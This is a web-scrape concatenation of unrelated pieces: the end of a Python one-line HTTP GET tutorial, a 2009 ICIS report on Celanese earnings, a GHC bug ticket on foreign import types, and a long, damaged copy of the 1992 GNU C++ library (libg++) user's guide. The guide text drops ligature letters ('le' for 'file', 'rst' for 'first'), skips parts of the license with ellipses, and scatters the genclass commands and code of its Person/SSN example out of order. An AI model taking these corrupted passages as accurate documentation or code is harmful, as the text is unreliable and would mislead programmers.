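threading.Thread(target=server.serve_forever, daemon=True).start()
url = "http://127.0.0.1:%d/" % server.server_address[1]

# GET in one line, as in Method 3:
get_body = urllib.request.urlopen(url).read()

# Passing data= switches urlopen() to a POST request:
post_body = urllib.request.urlopen(url, data=b"key=val").read()

print(get_body)   # b'<html>hello</html>'
print(post_body)  # b'posted:key=val'

server.shutdown()
```

The same local URL can be handed to requests.get() or requests.post() if the requests package is installed.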
https://blog.finxter.com/python-one-line-http-get/
27 October 2009 11:06 [Source: ICIS news]

LONDON (ICIS news)--Celanese's third-quarter net earnings more than doubled year on year to $399m (€267m) from $158m due to a deferred tax benefit, the US chemicals major said on Tuesday.

"The 2009 results included a benefit of approximately $382m related to a deferred tax benefit associated with the release of certain income tax valuation allowances," it added in a statement.

However, net sales for the three months ended 30 September were down 28% from the same period in 2008 to $1.304bn, and operating profit fell 56% year on year to $65m.

"Our third quarter results reflect stabilisation in demand across our major geographies and end-use applications with modest recovery in select areas," said chairman and CEO David Weidman. "Continued strength in …"

The company said in its outlook that it continued to see modest recovery in the global economy with increased volumes across all its businesses. It added the company planned to reduce costs by a further $100m.

($1 = €0.67)
http://www.icis.com/Articles/2009/10/27/9258220/celanese-reports-sharp-rise-in-q3-net-earnings-on-tax-benefit.html
Opened 19 months ago
Last modified 7 months ago

#7243 new bug
regression: acceptable foreign result types

Description

The following short file is rejected:

import Foreign.Ptr
foreign import ccall "wrapper" foo :: IO (FunPtr ())

The error is:

test.hs:2:1:
    Unacceptable type in foreign declaration: IO (FunPtr ())
    When checking declaration:
      foreign import ccall safe "wrapper" foo :: IO (FunPtr ())

However, my reading of the 2010 Report suggests this should be acceptable. Specifically:

- Prelude.IO t is a marshallable foreign result type when t is a marshallable foreign type,
- all basic foreign types are marshallable foreign types, and
- FunPtr a is a basic foreign type for all a.

(Political note: I include this chain of reasoning not because I think others too stupid to recreate it, but because I think it likely that I am not reading the Report correctly, and want to make it easy to detect and correct any misconceptions I have.)

Change History (6)

comment:1 Changed 19 months ago by td123
- Cc gostrc@… added

comment:2 Changed 19 months ago by romildo
- Cc malaquias@… added

comment:3 Changed 19 months ago by igloo
- Component changed from Compiler to Compiler (FFI)
- Difficulty set to Unknown
- Milestone set to 7.6.2
- Owner set to igloo

comment:4 Changed 19 months ago by simonpj
The problem is: e.g. this is accepted:
I'll leave the ticket open, though, as I think we should give the expected pattern in the error message.

comment:5 Changed 9 months ago by igloo
- Owner igloo deleted

comment:6 Changed 7 months ago by shelarcy
- Cc shelarcy@… added

Note: See TracTickets for help on using tickets.
https://ghc.haskell.org/trac/ghc/ticket/7243
User's Guide to the GNU C++ Class Library
last updated April 29, 1992 for version 2.0
Doug Lea (dl@g.oswego.edu)
Copyright (c) 1988, 1991, 1992 Free Software Foundation, Inc.

Permission is granted to make and distribute verbatim copies of this manual provided the copyright notice and this permission notice are preserved on all copies. Permission is granted to copy and distribute modified versions of this manual under the conditions for verbatim copying, provided also that the section entitled "GNU Library General Public License" is included exactly as in the original. Permission is granted to copy and distribute translations of this manual into another language, under the above conditions for modified versions, except that the section entitled "GNU Library General Public License" may be included in a translation approved by the author instead of in the original English.

Note: The GNU C++ library is still in test release. You will be performing a valuable service if you report any bugs you encounter.

GNU LIBRARY GENERAL PUBLIC LICENSE
Version 2, June 1991

Copyright (c) 1991 Free Software Foundation, Inc.
675 Mass Ave, Cambridge, MA 02139, USA
Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.

[This is the first released version of the library GPL. It is numbered 2 because it goes with version 2 of the ordinary GPL.]

… offer you this license which gives you legal permission to copy, distribute and/or modify the library. Also, for each distributor's protection, we want to make certain that everyone understands that there is no warranty for this free library. If the library is modified by someone else and passed on, we want its recipients to know that what they have is not the original version, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents.
We wish to avoid the danger that companies distributing free software will individually obtain patent licenses, thus in effect … different from the ordinary … effectively promote software sharing, because most developers did not use the libraries. We concluded that weaker conditions might promote sharing better. However, unrestricted linking of non-free programs would deprive the users of those programs of all benefit … files, but we have achieved it as regards changes in the actual functions of the Library.) The hope is that this will lead to faster development of free libraries.

The precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference … modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".)

"Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the library.

Activities other than copying, distribution and modification … offer warranty protection in exchange for a fee.

2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions:
a. The modified work must itself be a software library.
b. You must cause the files modified to carry prominent notices stating that you changed the files and the date of any change.
c. You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License.
d.
If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful. (For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the application. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.)

These requirements apply to the modified work as a whole. If identifiable … offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place satisfies … file that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law. If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object file … modification of the work for the customer's own use and reverse engineering for debugging such modifications. … modified executable containing the modified Library. (It is understood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile the application to use the modified definitions.)
b.
Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in Subsection 6a, above, for a charge no more than the cost of performing this distribution.
c. If distribution of the work is made by offering access to copy from a designated place, offer equivalent access to copy the above specified … find …

10. … 11. … 12. … 13. The Free Software Foundation may publish revised and/or new versions of the Library General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Library specifies … 14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software …

… file to most effectively convey the exclusion of warranty; and each file …

This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details.

You should have received a copy of the GNU Library General Public License along with this library; if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

signature of Ty Coon, 1 April 1990
Ty Coon, President of Vice

That's all there is to it!

Contributors to GNU C++ library

Aside from Michael Tiemann, who worked out the front end for GNU C++, and Richard Stallman, who worked out the back end, the following people (not including those who have made their contributions to GNU CC) should not go unmentioned. Doug Lea contributed most otherwise unattributed classes. Per Bothner contributed the iostream I/O classes. Dirk Grunwald contributed the Random number generation classes, and PairingHeaps.
Kurt Baudendistel contributed Fixed precision reals. Doug Schmidt contributed ordered hash tables, a perfect hash function generator, and several other utilities. Marc Shapiro contributed the ideas and preliminary code for Plexes. Eric Newton contributed the curses window classes. Some of the I/O code is derived from BSD 4.4, and was developed by the University of California, Berkeley. The code for converting accurately between floating point numbers and their string representations was written by David M. Gay of AT&T.

1 Installing GNU C++ library

1. Read through the README file and the Makefile. Make sure that all paths, system-dependent compile switches, and program names are correct.
2. Check that files `values.h', `stdio.h', and `math.h' declare and define values appropriate for your system.
3. Type `make all' to compile the library, test, and install. Current details about contents of the tests and utilities are in the `README' file.

2 Trouble in Installation

Here are some of the things that have caused trouble for people installing GNU C++ library.

1. Make sure that your GNU C++ version number is at least as high as your libg++ version number. For example, libg++ 1.22.0 requires g++ 1.22.0 or later releases.
2. Double-check system constants in the header files mentioned above.

3 GNU C++ library aims, objectives, and limitations

The GNU C++ library, libg++, is an attempt to provide a variety of C++ programming tools and other support to GNU C++ programmers. Differences in distribution policy are only part of the difference between libg++.a and AT&T libC.a. libg++ is not intended to be an exact clone of libC.
For one, libg++ contains bits of code that depend on special features of GNU g++ that are either different or lacking in the AT&T version, including slightly different inlining and overloading strategies, dynamic local arrays, etc. All of these differences are minor. For example, while the AT&T and GNU stream classes are implemented in very different ways, the vast majority of C++ programs compile and run under either version with no visible difference. Additionally, all g++-specific … first kind of support provides an interface between C++ programs and C libraries. This includes basic header files (like `stdio.h') as well as things like the File and stream classes. Other classes that interface to other aspects of C libraries (like those that maintain environmental information) are in various stages of development; all will undergo implementation modifications … files are available as a mechanism for generating common container classes. These are described in more detail in the introduction to container prototypes. Currently, only a textual substitution mechanism is available for generic class creation.

4 GNU C++ library stylistic conventions

C++ source files have file extension `.cc'. Both C-compatibility header files and class declaration files have extension `.h'. C++ class names begin with capital letters, except for istream and ostream, for AT&T C++ compatibility. Multi-word class names capitalize each word, with no underscore separation. Include files that define C++ classes begin with capital letters (as do the names of the classes themselves). `stream.h' is uncapitalized for AT&T C++ compatibility. Include files that supply function prototypes for other C functions (system calls and libraries) are all lower case. All include files define a preprocessor variable X_h, where X is the name of the file, and conditionally compile only if this has not been already defined.
The #pragma once facility is also used to avoid re-inclusion. Structures and objects that must be publicly defined, but are not intended for public use, have names beginning with an underscore (for example, the _Srep struct, which is used only by the String and SubString classes). The underscore is used to separate components of long function names, e.g., set_File_exception_handler(). When a function could be usefully defined either as a member or a friend, it is generally a member if it modifies and/or returns itself, else it is a friend. There are cases where naturalness of expression wins out over this rule. Class declaration files are formatted so that it is easy to quickly check them to determine function names, parameters, and so on. Because of the different kinds of things that may appear in class declarations, there is no perfect way to do this. Any suggestions on developing a common class declaration formatting style are welcome.

All classes use the same simple error (exception) handling strategy. Almost every class has a member function named error(char* msg) that invokes an associated error handler function via a pointer to that function, so that the error handling function may be reset by programmers. By default nearly all call *lib_error_handler, which prints the message and then aborts execution. This system is subject to change. In general, errors are assumed to be non-recoverable: Library classes do not include code that allows graceful continuation after exceptions.

5 Support for representation invariants

Most GNU C++ library classes possess a method named OK(), that is useful in helping to verify correct performance of class operations. The OK() operation checks the "representation invariant" of a class object. This is a test to check whether the object is in a valid state.
In effect, it is a (sometimes partial) verification of the library's promise that (1) class operations always leave objects in valid states, and (2) the class protects itself so that client functions cannot corrupt this state. While no simple validation technique can assure that all operations perform correctly, calls to OK() can at least verify that operations do not corrupt representations. For example, for String a, b, c; ... a = b + c;, a call to a.OK(); will guarantee that a is a valid String, but does not guarantee that it contains the concatenation of b + c. However, given that a is known to be valid, it is possible to further verify its properties, for example via a.after(b) == c && a.before(c) == b. In other words, OK() generally checks only those internal representation properties that are otherwise inaccessible to users of the class. Other class operations are often useful for further validation.

Failed calls to OK() call a class's error method if one exists, else directly call abort. Failure indicates an implementation error that should be reported. With only rare exceptions, the internal support functions for a class never themselves call OK() (although many of the test files in the distribution call OK() extensively). Verification of representational invariants can sometimes be very time consuming for complicated data structures.

6 Introduction to container class prototypes

As a temporary mechanism enabling the support of generic classes, the GNU C++ Library distribution contains a directory (`g++-include') of files designed to serve as the basis for generating container classes of specified elements. These files can be used to generate `.h' and `.cc' files in the current directory via a supplied shell script program that performs simple textual substitution to create specific classes.
While these classes are generated independently, and thus share no code, it is possible to create versions that do share code among subclasses. For example, using typedef void* ent, and then generating an entList class, other derived classes could be created using the void* coercion method described in Stroustrup, pp. 204-210. This very simple class-generation facility is useful enough to serve current purposes, but will be replaced with a more coherent mechanism for handling C++ generics in a way that minimally disrupts current usage. Without knowing exactly when or how parametric classes might be added to the C++ language, provision of this simplest possible mechanism, textual substitution, appears to be the safest strategy, although it does require certain redundancies and awkward constructions.

Specific classes may be generated via the `genclass' shell script program. This program has arguments specifying the kinds of base type(s) to be used. Specifying base types requires two arguments. The first is the name of the base type, which may be any named type, like int or String. Only named types are supported; things like int* are not accepted. However, pointers like this may be used by supplying the appropriate typedefs (e.g., editing the resulting files to include typedef int* intp;). The type name must be followed by one of the words val or ref, to indicate whether the base elements should be passed to functions by-value or by-reference. You can specify basic container classes using genclass base [val,ref] proto, where proto is the name of the class being generated. Container classes like dictionaries and maps that require two types may be specified via genclass -2 keytype [val,ref] basetype [val,ref] proto, where the key type is specified first and the contents type second. The resulting class names and file names are generated by prepending the specified type names to the prototype names, and separating the file name parts with dots.
For example, genclass int val List generates class intList residing in files `int.List.h' and `int.List.cc'. genclass -2 String ref int val VHMap generates (the awkward, but unavoidable) class name StringintVHMap. Of course, programmers may use typedef or simple editing to create more appropriate names. The existence of dot separators in file names allows the use of GNU make to help automate configuration and recompilation. An example Makefile exploiting such capabilities may be found in the `libg++/proto-kit' directory.

The genclass utility operates via simple text substitution using sed. All occurrences of the pseudo-types <T> and <C> (if there are two types) are replaced with the indicated type, and occurrences of <T&> and <C&> are replaced by just the types, if val is specified, or types followed by "&" if ref is specified. Programmers will frequently need to edit the `.h' file in order to insert additional #include directives or other modifications. A simple utility, `prepend-header', to prepend other `.h' files to generated files is provided in the distribution.

One dubious virtue of the prototyping mechanism is that, because source files, not archived library classes, are generated, it is relatively simple for programmers to modify container classes in the common case where slight variations of standard container classes are required. It is often a good idea for programmers to archive (via ar) generated classes into `.a' files so that only those class functions actually used in a given application will be loaded. The test subdirectory of the distribution shows an example of this. Because of #pragma interface directives, the `.cc' files should be compiled with -O or -DUSE_LIBGXX_INLINES enabled.

Many container classes require specifications over and above the base class type. For example, classes that maintain some kind of ordering of elements require specification of a comparison function upon which to base the ordering.
This is accomplished via a prototype file `defs.hP' that contains macros for these functions. While these macros default to perform reasonable actions, they can and should be changed in particular cases. Most prototypes require only one or a few of these. No harm is done if unused macros are defined to perform nonsensical actions. The macros are:

DEFAULT_INITIAL_CAPACITY
  The initial capacity for containers (e.g., hash tables) that require an initial capacity argument for constructors. Default: 100
<T>EQ(a, b)
  Return true if a is considered equal to b for the purposes of locating, etc., an element in a container. Default: (a == b)
<T>LE(a, b)
  Return true if a is less than or equal to b. Default: (a <= b)
<T>CMP(a, b)
  Return an integer < 0 if a<b, 0 if a==b, or > 0 if a>b. Default: (a <= b)? (a==b)? 0 : -1 : 1
<T>HASH(a)
  Return an unsigned integer representing the hash of a. Default: hash(a); where extern unsigned int hash(<T&>). (Note: several useful hash functions are declared in builtin.h and defined in hash.cc.)

Nearly all prototype container classes support container traversal via Pix pseudo-indices, as described elsewhere. All object containers must perform either a X::X(X&) (or X::X() followed by X::operator =(X&)) to copy objects into containers. (The latter form is used for containers built from C++ arrays, like VHSets.) When containers are destroyed, they invoke X::~X(). Any objects used in containers must have well behaved constructors and destructors. If you want to create containers that merely reference (point to) objects that reside elsewhere, and are not copied or destroyed inside the container, you must use containers of pointers, not containers of objects.

All prototypes are designed to generate HOMOGENOUS container classes. There is no universally applicable method in C++ to support heterogenous object collections with elements of various subclasses of some specified base class.
The only way to get heterogenous structures is to use collections of pointers-to-objects, not collections of objects (which also requires you to take responsibility for managing storage for the objects pointed to yourself). For example, the following usage illustrates a commonly encountered danger in trying to use container classes for heterogenous structures:

class Base { int x; ... };
class Derived : public Base { int y; ... };

BaseVHSet s; // class BaseVHSet generated via something like
             // `genclass Base ref VHSet'

void f()
{
  Base b;
  s.add(b);    // OK
  Derived d;
  s.add(d);    // (CHOP!)
}

At the line flagged with `(CHOP!)', a Base::Base(Base&) is called inside Set::add(Base&), not Derived::Derived(Derived&). Actually, in VHSet, a Base::operator =(Base&) is used instead to place the element in an array slot, but with the same effect. So only the Base part is copied as a VHSet element (a so-called chopped copy). In this case, it has an x part, but no y part; and a Base, not Derived, vtable. Objects formed via chopped copies are rarely sensible. To avoid this, you must resort to pointers:

typedef Base* BasePtr;

BasePtrVHSet s; // class BasePtrVHSet generated via something like
                // `genclass BasePtr val VHSet'

void f()
{
  Base* bp = new Base;
  s.add(bp);               // works fine.
  Base* dp = new Derived;
  s.add(dp);
  // Don't forget to delete bp and dp sometime.
  // The VHSet won't do this for you.
}

6.1 Example

The prototypes can be difficult to use on first attempt. Here is an example that may be helpful. The utilities in the `proto-kit' simplify much of the actions described, but are not used here.

Suppose you create a class Person, and want to make a Map that links the social security numbers associated with each person. You start off with a file `Person.h':

#include <String.h>

class Person
public: const String& name() { return nm; } const String& address() { return addr; } void print() { ... } //... } And in le `SSN.h', Your rst decision is what storage/usage strategy to use. There are several reasonable alternatives here: You might create an \object collection" of Persons, a \pointer collection" of pointersto-Persons, or even a simple String map, housing either copies of pointers to the names of Persons, since other elds are unused for purposes of the Map. In an object collection, instances of class Person \live" inside the Map, while in a pointer collection, the instances live elsewhere. Also, as above, if instances of subclasses of Person are to be used inside the Map, you must use pointers. In a String Map, the same dierence holds, but now only for the name elds. Any of these choices might make sense in particular applications. The second choice is the Map implementation strategy. Either a tree or a hash table might make sense. Suppose you want an AVL tree Map. There are two things to now check. First, as an object collection, the AVLMap requires that the elsement class contain an X(X&) constructor. In C++, if you don't specify such a constructor, one is constructed for you, but it is a very good idea to always do this yourself, to avoid surprises. In this example, you'd use something like class Person { ...; Person(const Person& p) :nm(p.nm), addr(p.addr) {} }; typedef unsigned int SSN; Also, an AVLMap requires a comparison function for elements in order to maintain order. Rather than requiring you to write a particular comparison function, a `defs' le is consulted to determine how to compare items. You must create and edit such a le. Before creating `Person.defs.h', you must rst make one additional decision. Should the Map member functions like m.contains(p) take arguments (p) by reference (i.e., typed as int Map::contains(const Person& p) or by value (i.e., typed as int Map::contains(const Person p). 
Generally, for user-dened classes, you want to pass by reference, and for builtins and pointers, to pass by value. SO you should pick by-reference. You can now create `Person.defs.h' via genclass Person ref defs. This creates a simple skeleton that you must edit. First, add #include "Person.h" to the top. Second, edit the <T>CMP(a,b) macro to compare on name, via which invokes the int compare(const String&, const String&) function from `String.h'. Of course, you could dene this in any other way as well. In fact, the default versions in the skeleton turn out to be OK (albeit inecient) in this particular example. #define <T>CMP(a, b) ( compare(a.name(), b.name()) ) Chapter 6: Introduction to container class prototypes 25 You may also want to create le `SSN.defs.h'. Here, choosing call-by-value makes sense, and since no other capabilities (like comparison functions) of the SSNs are used (and the defaults are OK anyway), you'd type and then edit to place #include "SSN.h" at the top. Finally, you can generate the classes. First, generate the base class for Maps via This generates only the abstract class, not the implementation, in le `Person.SSN.Map.h' and `Person.SSN.Map.cc'. To create the AVL implementation, type This creates the class PersonSSNAVLMap, in `Person.SSN.AVLMap.h' and `Person.SSN.AVLMap.cc'. To use the AVL implementation, compile the two generated `.cc' les, and specify `#include "Person.SSN.AVLMap.h"' in the application program. All other les are included in the right ways automatically. One last consideration, peculiar to Maps, is to pick a reasonable default contents when declaring an AVLMap. Zero might be appropriate here, so you might declare a Map, Suppose you wanted a VHMap instead of an AVLMap Besides generating dierent implementations, there are two dierences in how you should prepare the `defs' le. 
First, because a VHMap uses a C++ array internally, and because C++ array slots are initialized dierently than single elements, you must ensure that class Person contains (1) a no-argument constructor, and (2) an assignment operator. You could arrange this via class Person { ...; Person() {} void operator = (const Person& p) { nm = p.nm; addr = p.addr; } }; PersonSSNAVLMap m((SSN)0); genclass -2 Person ref SSN val AVLMap genclass -2 Person ref SSN val Map genclass SSN val defs (The lack of action in the constructor is OK here because Strings possess usable no-argument constructors.) You also need to edit `Person.defs.h' to indicate a usable hash function and default capacity, via something like Since the hashpjw function from `builtin.h' is appropriate here. Changing the default capacity to a value expected to exceed the actual capacity helps to avoid \hidden" ineciencies when a new VHMap is created without overriding the default, which is all too easy to do. Otherwise, everything is the same as above, substituting VHMap for AVLMap. #include <builtin.h> #define <T>HASH(x) (hashpjw(x.name().chars())) #define DEFAULT_INITIAL_CAPACITY 1000 26 User's Guide to the GNU C++ Class Library Chapter 7: Variable-Sized Object Representation 27 7 Variable-Sized Object Representation One of the rst goals of the GNU C++ library is to enrich the kinds of basic classes that may be considered as (nearly) \built into" C++. A good deal of the inspiration for these eorts is derived from considering features of other type-rich languages, particularly Common Lisp and Scheme. The general characteristics of most class and friend operators and functions supported by these classes has been heavily in uenced by such languages. Four of these types, Strings, Integers, BitSets, and BitStrings (as well as associated and/or derived classes) require representations suitable for managing variable-sized objects on the freestore. 
The basic technique used for all of these is the same, although various details necessarily differ in order to support efficient operations. Efficiency wins out over parsimony here, as part of the goal to produce classes that provide sufficient functionality and efficiency so that programmers are not tempted to try to manipulate or bypass the underlying representations.

8 Some guidelines for using expression-oriented classes

The fact that C++ allows operators to be overloaded for user-defined types makes expressions on classes like Integer convenient to write. However, an expression such as c = a + b + a is evaluated via temporaries: one temporary holds a + b, a second holds that sum plus a, this second temporary is finally copied into c, and the temporaries are then deleted. In other words, this code might have an effect similar to

    Integer a, b, c; ...;
    Integer t1(a); t1 += b;
    Integer t2(t1); t2 += a;
    c = t2;

For small objects, simple operators, and/or non-time/space critical programs, creation of temporaries is not a big problem. However, often, when fine-tuning a program, it may be a good idea to rewrite such code in a less pleasant, but more efficient manner. For builtin types like ints and floats, C and C++ compilers already know how to optimize such expressions to reduce the need for temporaries. Unfortunately, this is not true for C++ user-defined types. For this reason, the classes also supply procedural forms of the operators (like add(a, b, c) for c = a + b) that give you the flexibility to reuse operands as destinations. With some manual cleverness, you might yourself come up with a sequence such as

    sub(a, b, a); mul(a, ..., a); div(a, c, a);

GNU C++ also allows a function to manipulate the returned object directly, rather than requiring you to create a local inside a function and then copy it out as the returned value. In this example, this can be done via

    Integer f(const Integer& a) return r(a) { r += a; return; }

A final guideline: The overloaded operators are very convenient, and much clearer to use than procedural code. It is almost always a good idea to make it right, then make it fast, by translating expression code into procedural code after it is known to be correct.

9 Pseudo-indexes

Many useful classes operate as containers of elements.
Techniques for accessing these elements from a container differ from class to class. In the GNU C++ library, access methods have been partially standardized across different classes via the use of pseudo-indexes called Pixes. A Pix acts in some ways like an index, and in some ways like a pointer. (Their underlying representations are just void* pointers.) A Pix is a kind of "key" that is translated into an element access by the class. In virtually all cases, Pixes are pointers to some kind of internal storage cells. The containers use these pointers to extract items.

Pixes support traversal and inspection of elements in a collection using analogs of array indexing. However, they are pointer-like in that 0 is treated as an invalid Pix, and unsafe insofar as programmers can attempt to access nonexistent elements via dangling or otherwise invalid Pixes without first checking for their validity. In general it is a very bad idea to perform traversals in the midst of destructive modifications to containers.

Typical applications might include code using the idiom

    for (Pix i = a.first(); i != 0; a.next(i)) use(a(i));

for some container a and function use. Classes supporting the use of Pixes always contain the following methods, assuming a container a of element types of Base.

Pix i = a.first()
    Set i to index the first element of a, or 0 if a is empty.
a.next(i)
    Advance i to the next element of a, or 0 if there is no next element.
Base x = a(i); a(i) = x;
    a(i) returns a reference to the element indexed by i.
int present = a.owns(i)
    Returns true if Pix i is a valid Pix in a. This is often a relatively slow operation, since the collection must usually traverse through elements to see if any correspond to the Pix.

Some container classes also support backwards traversal via

Pix i = a.last()
    Set i to the last element of a, or 0 if a is empty.
a.prev(i)
    Sets i to the previous element in a, or 0 if there is none.
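The traversal idiom above can be made concrete with a toy container. This is a hedged sketch, not library code: each Pix is simply a pointer to an internal cell, 0 means "no element", and owns performs the linear scan the text warns about.

```cpp
#include <cstddef>

typedef void* Pix;  // as in the library: an opaque pseudo-index

// Toy singly-linked container illustrating Pix-style access.
class IntList {
  struct Cell { int item; Cell* next; };
  Cell* head;
public:
  IntList() : head(0) {}
  ~IntList() { while (head) { Cell* c = head; head = c->next; delete c; } }
  void prepend(int x) { head = new Cell{x, head}; }

  Pix first() const { return head; }                 // 0 if empty
  void next(Pix& i) const { i = ((Cell*)i)->next; }  // 0 after last element
  int& operator()(Pix i) { return ((Cell*)i)->item; }
  int owns(Pix i) const {     // linear scan: "relatively slow", as noted
    for (Cell* c = head; c != 0; c = c->next)
      if ((Pix)c == i) return 1;
    return 0;
  }
};
```

With this, the idiom from the text works unchanged: for (Pix i = a.first(); i != 0; a.next(i)) use(a(i));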
Collections supporting elements with an equality operation possess

Pix j = a.seek(x)
    Sets j to the index of the first occurrence of x, or 0 if x is not contained in a.

Bag classes possess

Pix j = a.seek(x, Pix from = 0)
    Sets j to the index of the next occurrence of x following from, or 0 if x is not contained in a. If from == 0, the first occurrence is returned.

Set, Bag, and PQ classes possess

Pix j = a.add(x)   (or a.enq(x) for priority queues)
    Adds x to the collection, returning its Pix. The Pix of an item can change in collections where further additions and deletions involve the actual movement of elements (currently in OXPSet, OXPBag, XPPQ, VOHSet), but in all other cases, an item's Pix may be considered a permanent key to its location.

10 Header files for interfacing C++ to C

The following files are provided so that C++ programmers may invoke common C library and system calls. The names and contents of these files are subject to change in order to be compatible with the forthcoming GNU C library. Other files, not listed here, are simply C++-compatible interfaces to corresponding C library files.

`values.h'
    A collection of constants defining the numbers of bits in builtin types, minimum and maximum values, and the like. Most names are the same as those found in `values.h' found on Sun systems.
`std.h'
    A collection of common system calls and `libc.a' functions. Only those functions that can be declared without introducing new type definitions (socket structures, for example) are provided. Common char* functions (like strcmp) are among the declarations. All functions are declared along with their library names, so that they may be safely overloaded.
`string.h'
    This file merely includes `<std.h>', where string function prototypes are declared. This is a workaround for the fact that system `string.h' and `strings.h' files often differ in contents.
`osfcn.h'
    This file merely includes `<std.h>', where system function prototypes are declared.
`libc.h'
    This file merely includes `<std.h>', where C library function prototypes are declared.
`math.h'
    A collection of prototypes for functions usually found in libm.a, plus some #defined constants that appear to be consistent with those provided in the AT&T version. The value of HUGE should be checked before using. Declarations of all common math functions are preceded with overload declarations, since these are commonly overloaded.
`stdio.h'
    Declaration of FILE (_iobuf), common macros (like getc), and function prototypes for `libc.a' functions that operate on FILE*'s. The value BUFSIZ and the declaration of _iobuf should be checked before using.
`assert.h'
    C++ versions of assert macros.
`generic.h'
    String concatenation macros useful in creating generic classes. They are similar in function to the AT&T CC versions.
`new.h'
    Declarations of the default global operator new, the two-argument placement version, and associated error handlers.

11 Utility functions for built in types

Files `builtin.h' and corresponding `.cc' implementation files contain various convenient inline and non-inline utility functions. These include useful enumeration types, such as TRUE and FALSE, the type definition for pointers to libg++ error handling functions, and the following functions.

long abs(long x);
double abs(double x);
    Inline versions of abs. Note that the standard libc.a version, int abs(int), is not declared as inline.
void clearbit(long& x, long b);
    Clears the b'th bit of x (inline).
void setbit(long& x, long b);
    Sets the b'th bit of x (inline).
int testbit(long x, long b);
    Returns the b'th bit of x (inline).
int even(long y);
    Returns true if y is even (inline).
int odd(long y);
    Returns true if y is odd (inline).
int sign(long x);
int sign(double x);
    Returns -1, 0, or 1, indicating whether x is less than, equal to, or greater than zero (inline).
long gcd(long x, long y);
    Returns the greatest common divisor of x and y.
long lcm(long x, long y);
    Returns the least common multiple of x and y.
long lg(long x);
    Returns the floor of the base 2 log of x.
long pow(long x, long y);
double pow(double x, long y);
    Returns x to the integer power y using the iterative O(log y) "Russian peasant" method.
long sqr(long x);
double sqr(double x);
    Returns x squared (inline).
long sqrt(long x);
    Returns the floor of the square root of x.
unsigned int hashpjw(const char* s);
    A hash function for null-terminated char* strings using the method described in Aho, Sethi, & Ullman, p 436.
unsigned int multiplicativehash(int x);
    A hash function for integers that returns the lower bits of multiplying x by the golden ratio times pow(2, 32). See Knuth, Vol 3, p 508.
unsigned int foldhash(double x);
    A hash function for doubles that exclusive-or's the first and second words of x, returning the result as an integer.
double start_timer()
    Starts a process timer.
double return_elapsed_time(double last_time)
    Returns the process time since last_time. If last_time == 0, returns the time since the last start_timer. Returns -1 if start_timer was not first called.

File `Maxima.h' includes versions of MAX, MIN for builtin types. File `compare.h' includes versions of compare(x, y) for builtin types. These return negative if the first argument is less than the second, zero for equal, and positive for greater.

12 Library dynamic allocation primitives

Libg++ contains versions of malloc, free, realloc that were designed to be well-tuned to C++ applications.
The source file `malloc.c' contains some design and implementation details. Here are the major user-visible differences from most system malloc routines:

1. These routines overwrite storage of freed space. This means that it is never permissible to use a delete'd object in any way. Doing so will either result in trapped fatal errors or random aborts within malloc, free, or realloc.

2. The routines tend to perform well when a large number of objects of the same size are allocated and freed. You may find that it is not worth it to create your own special allocation schemes in such cases.

3. The library sets top-level operator new() to call malloc and operator delete() to call free. Of course, you may override these definitions in C++ programs by creating your own operators that will take precedence over the library versions. However, if you do so, be sure to define both operator new() and operator delete().

4. These routines do not support the odd convention, maintained by some versions of malloc, that you may call realloc with a pointer that has been free'd.

5. The routines automatically perform simple checks on free'd pointers that can often determine whether users have accidentally written beyond the boundaries of allocated space, resulting in a fatal error.

6. The function malloc_usable_size(void* p) returns the number of bytes actually allocated for p. For a valid pointer (i.e., one that has been malloc'd or realloc'd but not yet free'd) this will return a number greater than or equal to the requested size, else it will normally return 0. Unfortunately, a non-zero return cannot be an absolutely perfect indication of lack of error. If a chunk has been free'd but then re-allocated for a different purpose elsewhere, then malloc_usable_size will return non-zero. Despite this, the function can be very valuable for performing run-time consistency checks.

7. malloc requires 8 bytes of overhead per allocated chunk, plus a maximum alignment adjustment of 8 bytes.
The number of bytes of usable space is exactly as requested, rounded to the nearest 8 byte boundary.

8. The routines do not contain any synchronization support for multiprocessing. If you perform global allocation on a shared memory multiprocessor, you should disable compilation and use of libg++ malloc in the distribution `Makefile' and use your system version of malloc.

13 The new input/output classes

14 The old I/O library

WARNING: This chapter describes classes that are obsolete. These classes are normally not available when libg++ is installed normally. The sources are currently included in the distribution, and you can configure libg++ to use them.

14.1 File-based classes

The File class supports basic IO on Unix files. Operations are based on common C stdio library functions. File serves as the base class for istreams, ostreams, and other derived classes. It contains the interface between the Unix stdio file library and these more structured classes. Most operations are implemented as simple calls to stdio functions. File class operations are also fully compatible with raw system file reads and writes (like the system read and lseek calls) when buffering is disabled (see below). The FILE* stdio file pointer is, however, maintained as protected. Classes derived from File may only use the IO operations provided by File, which encompass essentially all stdio capabilities.

